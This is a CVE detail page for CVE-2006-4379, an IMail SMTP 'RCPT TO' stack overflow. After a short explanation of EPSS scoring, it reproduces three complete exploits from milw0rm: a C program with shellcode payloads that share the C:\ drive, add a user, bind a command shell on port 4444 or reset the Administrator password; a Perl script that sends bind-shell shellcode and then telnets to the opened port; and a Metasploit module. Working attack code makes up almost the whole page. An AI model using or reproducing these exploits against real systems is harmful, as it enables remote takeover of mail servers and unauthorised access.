CVE-2006-4379 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// IMail 2006 and 8.x SMTP Stack Overflow Exploit // coded by Greg Linares [glinares.code[at]gmail[dot]com // http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html // This works on the following versions: // 2006 IMail prior to 2006.1 update #include <stdio.h> #include <string.h> #include <windows.h> #include <winsock.h> #pragma comment(lib,"wsock32.lib") int main(int argc, char *argv[]) { static char overflow[1028]; // PAYLOADS // Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More) /* win32_exec - EXITFUNC=seh CMD=net share Export=C:\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */ unsigned char RootShare[] = "\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x74\x24\xf4\x58" "\x31\x50\x17\x83\xc0\x04\x03\xaa\xfc\xa5\xde\xb6\xeb\x6e\x21\x46" "\xec\xe5\x64\x7a\x67\x85\x63\xfa\x76\x99\xe7\xb5\x60\xee\xa7\x69" "\x90\x1b\x1e\xe2\xa6\x50\xa0\x1a\xf7\xa6\x3a\x4e\x7c\xe6\x49\x89" "\xbc\x2d\xbc\x94\xfc\x59\x4b\xad\x54\xba\xb0\xa4\xb1\x49\xe7\x62" "\x3b\xa5\x7e\xe1\x37\x72\xf4\xaa\x5b\x85\xe1\xdf\x78\x0e\xf4\x34" "\x09\x4c\xd3\xce\xc9\x5c\xdb\xaa\x46\xde\xeb\xb7\x99\xa7\x07\x3c" "\x59\x54\x93\x32\x46\xc9\x28\xda\x7e\xfa\x26\x91\xff\x4c\x38\xa5" "\xff\x27\x51\x99\xa0\x06\x54\x81\x08\xe0\x60\xc2\x75\x89\xc0\xac" "\x85\xe4\xe5\x73\x0e\x61\x1b\x01\xc0\xc6\x1b\xf2\xb3\x8d\x97\xdc" "\x38\x26\x39\x6e\xda\x96\xfc\xf6\x54\xb8\x8c\x72\xa8\x05\x4b\x26" "\xf2\xa6\xde\xb8\x9e\xd1\x4d\x2d\x2b\x47\xea\xad"; /* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */ unsigned char Win32Bind[] = "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93" "\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9" "\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd" "\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf" "\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e" "\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd" "\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd" "\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66" "\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6" "\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34" "\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65" "\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7" "\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e" "\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f" "\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61" "\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66" "\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b" "\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9" "\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67" "\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6" "\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69" "\xc0\x84\x6b\xc9\x43\x7b\xbd\x36"; /* win32_adduser - PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char AddUser[] = "\x2b\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2" "\xe6\xaf\x6a\x83\xeb\xfc\xe2\xf4\x4e\x0e\xeb\x6a\xb2\xe6\x24\x2f" "\x8e\x6d\xd3\x6f\xca\xe7\x40\xe1\xfd\xfe\x24\x35\x92\xe7\x44\x23" "\x39\xd2\x24\x6b\x5c\xd7\x6f\xf3\x1e\x62\x6f\x1e\xb5\x27\x65\x67" "\xb3\x24\x44\x9e\x89\xb2\x8b\x6e\xc7\x03\x24\x35\x96\xe7\x44\x0c" "\x39\xea\xe4\xe1\xed\xfa\xae\x81\x39\xfa\x24\x6b\x59\x6f\xf3\x4e" "\xb6\x25\x9e\xaa\xd6\x6d\xef\x5a\x37\x26\xd7\x66\x39\xa6\xa3\xe1" "\xc2\xfa\x02\xe1\xda\xee\x44\x63\x39\x66\x1f\x6a\xb2\xe6\x24\x02" "\x8e\xb9\x9e\x9c\xd2\xb0\x26\x92\x31\x26\xd4\x3a\xda\x16\x25\x6e" "\xed\x8e\x37\x94\x38\xe8\xf8\x95\x55\x85\xc2\x0e\x9c\x83\xd7\x0f" "\x92\xc9\xcc\x4a\xdc\x83\xdb\x4a\xc7\x95\xca\x18\x92\xa3\xdd\x18" "\xdd\x94\x8f\x2f\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xc6\x89\x4c" "\x92\x88\xca\x1e\x92\x8a\xc0\x09\xd3\x8a\xc8\x18\xdd\x93\xdf\x4a" "\xf3\x82\xc2\x03\xdc\x8f\xdc\x1e\xc0\x87\xdb\x05\xc0\x95\x8f\x2f" "\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xe6\xaf\x6a"; /* win32_exec - CMD=net user Administrator "p@ssw0rd" Size=187 Encoder=Pex http://metasploit.com */ unsigned char ChangeAdmin[] = "\x29\xc9\x83\xe9\xda\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x74" "\xb8\x4f\xba\x83\xee\xfc\xe2\xf4\x88\x50\x0b\xba\x74\xb8\xc4\xff" "\x48\x33\x33\xbf\x0c\xb9\xa0\x31\x3b\xa0\xc4\xe5\x54\xb9\xa4\xf3" "\xff\x8c\xc4\xbb\x9a\x89\x8f\x23\xd8\x3c\x8f\xce\x73\x79\x85\xb7" "\x75\x7a\xa4\x4e\x4f\xec\x6b\xbe\x01\x5d\xc4\xe5\x50\xb9\xa4\xdc" "\xff\xb4\x04\x31\x2b\xa4\x4e\x51\xff\xa4\xc4\xbb\x9f\x31\x13\x9e" "\x70\x7b\x7e\x7a\x10\x33\x0f\x8a\xf1\x78\x37\xb6\xff\xf8\x43\x31" "\x04\xa4\xe2\x31\x1c\xb0\xa4\xb3\xff\x38\xff\xba\x74\xb8\xc4\xd2" "\x48\xe7\x7e\x4c\x14\xee\xc6\x42\xf7\x78\x34\xea\x1c\x48\xc5\xbe" "\x2b\xd0\xd7\x44\xfe\xb6\x18\x45\x93\xd6\x2a\xce\x54\xcd\x3c\xdf" "\x06\x98\x0b\xc8\x15\xd3\x2a\x9a\x5b\xd9\x2b\xde\x74\xb8\x4f\xba"; WSADATA wsaData; struct hostent *hp; struct sockaddr_in sockin; char buf[300], *check; int sockfd, bytes; int plen, i, JMP; char *hostname; unsigned short port; printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit\n"); printf("Coded by Greg Linares < glinares.code [at] GMAIL [dot] com >\n"); if (argc <= 1) { printf("Usage: %s [hostname] [port] <Payload> <JMP>\n", argv[0]); printf("Default port is 25 \r\n"); printf("==============================\n"); printf("Payload Options: 1 = Default\n"); printf("==============================\n"); printf("1 = Share C:\\ as 'Export' Share\n"); printf("2 = Add User 'Error' with Password 'Error'\n"); printf("3 = Win32 Bind CMD to Port 4444\n"); printf("4 = Change Administrator Password to 'p@ssw0rd'\n"); printf("==============================\n"); printf("JMP Options: 1 = Default\n"); printf("==============================\n"); printf("1 = IMAIL 8.x SMTPDLL.DLL [pop ebp, ret] 0x10036f71 \n"); printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af \n"); printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 \n"); printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 \n"); printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c \n"); printf("6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 \n"); printf("7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 \n"); printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 \r\n"); exit(0); } hostname = argv[1]; if (argv[2]) port = atoi(argv[2]); else port = atoi("25"); if (argv[4]) JMP = atoi(argv[4]); else JMP = atoi("1"); if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) { fprintf(stderr, "Error setting up with WinSock v1.1\n"); exit(-1); } hp = gethostbyname(hostname); if (hp == NULL) { printf("ERROR: Uknown host %s\n", hostname); printf("%s",hostname); exit(-1); } sockin.sin_family = hp->h_addrtype; sockin.sin_port = htons(port); sockin.sin_addr = *((struct in_addr *)hp->h_addr); if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) { printf("ERROR: Socket Error\n"); exit(-1); } if ((connect(sockfd, (struct sockaddr *) &sockin, sizeof(sockin))) == SOCKET_ERROR) { printf("ERROR: Connect Error\n"); closesocket(sockfd); WSACleanup(); exit(-1); } printf("Connected to [%s] on port [%d], sending overflow....\n", hostname, port); if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) { printf("ERROR: Recv Error\n"); closesocket(sockfd); WSACleanup(); exit(1); } /* wait for SMTP service welcome*/ buf[bytes] = '\0'; check = strstr(buf, "220"); if (check == NULL) { printf("ERROR: NO response from SMTP service\n"); closesocket(sockfd); WSACleanup(); exit(-1); } // JMP to EAX = Results in a Corrupted Stack // so instead we POP EBP, RET to restore pointer and then return // this causes code procedure to continue /* ['IMail 8.x Universal', 0x10036f71 ], ['Windows 2003 SP1 English', 0x7c87d8af ], ['Windows 2003 SP0 English', 0x77d5c14c ], ['Windows XP SP2 English', 0x7c967e23 ], ['Windows XP SP1 English', 0x71ab389c ], ['Windows XP SP0 English', 0x71ab389c ], ['Windows 2000 Universal English', 0x75021397 ], ['Windows 2000 Universal French', 0x74fa1397], ['Windows XP SP1 - SP2 German', 0x77d18c14], */ char Exp[] = "RCPT TO: <@"; // This stores our JMP between the @ and : char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:"; //Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af char WinXPSP2E[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 char IMail815[] = "\x71\x6f\x03\x10:"; //IMAIL 8.15 SMTPDLL.DLL [pop ebp, ret] 0x10036f71 char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:"; //Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c char WinXPSP2[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23 char WinXPSP1[] = "\x9c\x38\xab\x71:"; //WinXP SP1 and 0 English U32 [pop ebp, ret]0x71ab389c char Win2KE[] = "\x97\x31\x02\x75:"; //Win2k English All SPs [pop ebp, ret]0x75021397 char Win2KF[] = "\x97\x13\xfa\x74:"; // As above except French Win2k [pop ebp, ret]0x74fa1397 char WinXPG[] = "\x14\x8c\xd1\x77:"; //WinXP SP1 - SP2 German U32 [pop ebp, ret]0x77d18c14 char tail[] = "SSS>\n"; // This closes the RCPT cmd. Any characters work. // Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems // After around 560 bytes or so EIP gets overwritten. But this method is easier to exploit and it works // On all versions from 8.x to 2006 (9.x?) char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44"; // Stabolize Stack prior to payload. memset(overflow, 0, 1028); strcat(overflow, Exp); if (JMP == 1) { printf("Using IMail 8.15 SMTDP.DLL JMP\n"); strcat(overflow, IMail815); } else if (JMP == 2) { printf("Using Win2003 SP1 NTDLL.DLL JMP\n"); strcat(overflow, Win2k3SP1E); } else if (JMP == 3) { printf("Using Win2003 SP0 USER32.DLL JMP\n"); strcat(overflow, Win2k3SP0E); } else if (JMP == 4) { printf("Using WinXP SP2 NTDLL.DLL JMP\n"); strcat(overflow, WinXPSP2E); } else if (JMP == 5) { printf("Using WinXP SP1 and SP0 USER32.DLL JMP\n"); strcat(overflow, WinXPSP1); } else if (JMP == 6) { printf("Using Win2000 Universal English USER32.DLL JMP\n"); strcat(overflow, Win2KE); } else if (JMP == 7) { printf("Using Win2000 Universal French USER32.DLL JMP\n"); strcat(overflow, Win2KF); } else if (JMP == 8) { printf("Using WinXP SP2 and SP1 German USER32.DLL JMP\n"); strcat(overflow, WinXPG); } else { printf("Using IMail 8.15 SMTDP.DLL JMP\n"); strcat(overflow, IMail815); } // Setup Payload Options if (atoi(argv[3]) == 1) { printf("Using Root Share Payload\n"); plen = 544 - ((strlen(RootShare) + strlen(StackS))); for (i=0; i<plen; i++){ strcat(overflow, "\x90"); } strcat(overflow, StackS); strcat(overflow, RootShare); } else if (atoi(argv[3]) == 2) { printf("Using Add User Payload\n"); plen = 544 - ((strlen(AddUser)+ strlen(StackS))); for (i=0; i<plen; i++){ strcat(overflow, "\x90"); } strcat(overflow, StackS); strcat(overflow, AddUser); } else if (atoi(argv[3]) == 3) { printf("Using Win32 CMD Bind Payload\n"); plen = 544 - ((strlen(Win32Bind) + strlen(StackS))); for (i=0; i<plen; i++){ strcat(overflow, "\x90"); } strcat(overflow, StackS); strcat(overflow, Win32Bind); } else if (atoi(argv[3]) == 4) { printf("Using Change Admin Password Payload (Pwd = 'p@ssw0rd')\n"); plen = 544 - ((strlen(ChangeAdmin) + strlen(StackS))); for (i=0; i<plen; i++){ strcat(overflow, "\x90"); } strcat(overflow, StackS); strcat(overflow, ChangeAdmin); } else { printf("Using Win32 CMD Bind Payload\n"); plen = 544 - ((strlen(Win32Bind) + strlen(StackS))); for (i=0; i<plen; i++){ strcat(overflow, "\x90"); } strcat(overflow, StackS); strcat(overflow, Win32Bind); } // Dont forget to add the trailing characters to set up stack overflow strcat(overflow, tail); // Connect to SMTP Server and Setup Up Email char EHLO[] = "EHLO \r\n"; char MF[] = "MAIL FROM <TEST@TEST> \r\n"; send(sockfd, EHLO, strlen(EHLO), 0); Sleep(1000); send(sockfd, MF, strlen(MF), 0); Sleep(1000); if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR) { printf("ERROR: Send Error\n"); closesocket(sockfd); WSACleanup(); exit(-1); } printf("Exploit Sent.....\r\n"); if (atoi(argv[3]) == 3) { printf("Check Shell on Port 4444\n"); closesocket(sockfd); WSACleanup(); exit(0); } printf("Checking If Exploit Executed....\r\n"); Sleep(1000); closesocket(sockfd); sockin.sin_family = hp->h_addrtype; sockin.sin_port = htons(port); sockin.sin_addr = *((struct in_addr *)hp->h_addr); if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) { printf("ERROR: Socket Error\n"); exit(-1); } if ((connect(sockfd, (struct sockaddr *) &sockin, sizeof(sockin))) == SOCKET_ERROR) { printf("Exploit Successfully Delivered!\n"); closesocket(sockfd); WSACleanup(); printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!"); exit(0); } printf("..."); if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) { printf("Exploit Successfully Delivered!\n"); closesocket(sockfd); WSACleanup(); printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!"); exit(0); } /* wait for SMTP service welcome*/ buf[bytes] = '\0'; check = strstr(buf, "220"); if (check == NULL) { printf("Exploit Successfully Delivered!\n"); closesocket(sockfd); WSACleanup(); printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!"); exit(0); } printf("Exploit Failed: Try A different JMP Method or Payload\n"); closesocket(sockfd); WSACleanup(); exit (1); } // milw0rm.com [2006-10-19]

#!/usr/bin/perl # http://www.zerodayinitiative.com/advisories/ZDI-06-028.html # https://www.securityfocus.com/bid/19885 # # acaro [at] jervus.it use IO::Socket::INET; use Switch; if (@ARGV < 3) { print "--------------------------------------------------------------------\n"; print "Usage : Imail-rcpt-overflow.pl -hTargetIPAddress -oTargetReturnAddress\n"; print " Return address: \n"; print " o1 - IMail 8.12 Version\n"; print " o2 - IMail 8.10 Versio\n"; print " Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl -h127.0.0.1 -o1 \n"; print "--------------------------------------------------------------------\n"; } use IO::Socket::INET; my $host = 10.0.0.2; my $port = 25; my $reply; my $request; my $happystack="\x81\xc4\xff\xef\xff\xff\x44"; foreach (@ARGV) { $host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/); $eip = $1 if ($_=~/-o(.*)/); } switch ($eip) { case 1 { $eip="\xc4\x91\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.12 case 2 { $eip="\xc3\x88\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.10 } # win32_bind - EXITFUNC=seh LPORT=4444 my $shellcode = "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93". "\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9". "\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd". "\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf". "\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e". "\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd". "\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd". "\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66". "\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6". "\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34". "\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65". "\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7". "\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e". "\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f". "\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61". "\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66". "\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b". "\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9". "\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67". "\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6". "\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69". "\xc0\x84\x6b\xc9\x43\x7b\xbd\x36"; my $nop="\x41"x137; my $buffer = "RCPT TO:"."\x20\x3c\x40".$eip . "\x3a" .$nop.$happystack.$shellcode."\x4a\x61\x63\x3e"."\n"; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host!\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = "EHLO " . "\r\n"; send $socket, $request, 0; print "[+] Sent EHLO\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n"; send $socket, $request, 0; print "[+] Sent MAIL FROM\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = $buffer; send $socket, $request, 0; print "[+] Sent malicius request\n"; close $socket; print " + connect on port 4444 of $host ...\n"; sleep(3); system("telnet $host 4444"); exit; # milw0rm.com [2007-02-04]

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::imail_smtp_rcpt_overflow; use base "Msf::Exploit"; use strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'], 'Priv' => 1, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 25], 'Encoder' => [1, 'EncodedPayload', 'Use Pex!!'], }, 'AutoOpts' => { 'EXITFUNC' => 'seh' }, 'Payload' => { 'Space' => 400, 'BadChars' => "\x00\x0d\x0a\x20\x3e\x22\x40", 'Keys' => ['+ws2ord'], }, 'Description' => Pex::Text::Freeform(qq{ This module exploits a stack based buffer overflow in IMail 2006 and 8.x SMTP service. If we send a long strings for RCPT TO command contained within the characters '@' and ':' we can overwrite the eip register and exploit the vulnerable smpt service }), 'Refs' => [ ['BID', '19885'], ['CVE', '2006-4379'], ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'], ], 'Targets' => [ ['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10 ['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12 ], 'DefaultTarget' => 0, 'Keys' => ['smtp'], 'DisclosureDate' => 'September 7 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; my $ehlo = "EHLO " . "\r\n"; my $mail_from = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n"; my $pattern = "\x20\x3c\x40"; $pattern .= pack('V', $target->[1]); $pattern .="\x3a" . $self->MakeNops((0x1e8-length ($shellcode))); $pattern .= $shellcode; $pattern .= "\x4a\x61\x63\x3e"; my $request = "RCPT TO: " . $pattern ."\n"; $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using pop eax, ret at 0x%.8x...", $target->[1])); my $s = Msf::Socket::Tcp->new ( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ($s->IsError) { $self->PrintLine('[*] Error creating socket: ' . $s->GetError); return; } my $r = $s->Recv(-1, 5); $s->Send($ehlo); $self->PrintLine("[*] I'm sending ehlo command"); $self->PrintLine("[*] $r"); sleep(2); $s->Send($mail_from); $self->PrintLine("[*] I'm sending mail from command"); $r = $s->Recv(-1, 10); $self->PrintLine("[*] $r"); sleep(2); $s->Send($request); $self->PrintLine("[*] I'm sending rcpt to command"); sleep(2); return; } # milw0rm.com [2007-02-04]